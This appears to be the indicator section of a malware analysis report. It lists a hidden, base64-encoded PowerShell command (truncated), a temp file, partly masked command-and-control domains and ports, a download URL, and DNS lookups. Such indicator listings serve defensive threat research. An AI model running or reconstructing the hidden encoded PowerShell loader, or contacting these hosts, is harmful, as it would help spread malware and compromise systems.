Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -enco JABQAGoAdgBhAGkAbgBkAHYAcwB6AD0AJwBGAHEAbABnAGIAdAB3AGEAYgB5AGMAdgAnADsAJABYAGgAcQB3AHoAdwBjAHMAaQBoAGUAdgAgAD0AIAAnADQAMwAzACcAOwAkAFgAcgBjAG4AbABiAHAAbgB1AD0...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1460
- %TEMP%\1043911.cvr
- 'bo######villadelrosario.org':80
- 'bo######villadelrosario.org':443
- 'ki####toysclub.com':443
- 'nc##p.com':443
- http://bo######villadelrosario.org/MyAdmin/8t/
- 'bo######villadelrosario.org':443
- 'ki####toysclub.com':443
- 'nc##p.com':443
- DNS ASK bo######villadelrosario.org
- DNS ASK pi###ife7.com
- DNS ASK ki####toysclub.com
- DNS ASK se###sgroup.com
- DNS ASK nc##p.com